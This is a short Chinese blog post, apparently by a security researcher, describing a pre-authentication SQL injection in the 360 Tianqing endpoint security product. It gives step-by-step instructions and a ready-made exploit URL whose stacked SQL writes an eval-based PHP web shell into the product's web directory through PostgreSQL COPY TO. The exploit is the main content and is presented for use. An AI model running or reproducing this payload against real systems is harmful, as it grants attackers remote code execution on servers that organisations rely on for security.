360天擎前台SQL注入漏洞

SQL注入

Posted by hackeyes on April 8, 2021

漏洞利用过程

1. 通过安装包安装的一般都有root权限,因此该注入点可尝试写shell

2. 通过注入点,创建一张表 O

3. 为 表O 添加一个新字段 T 并且写入shell内容

4. Postgres数据库 使用COPY TO把一个表的所有内容都拷贝到一个文件(完成写shell)

5. 删除 表O

EXP(注入写shell)

1
https://IP/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to 'C:\Program Files (x86)\360\skylar6\www\1.php';drop table O;--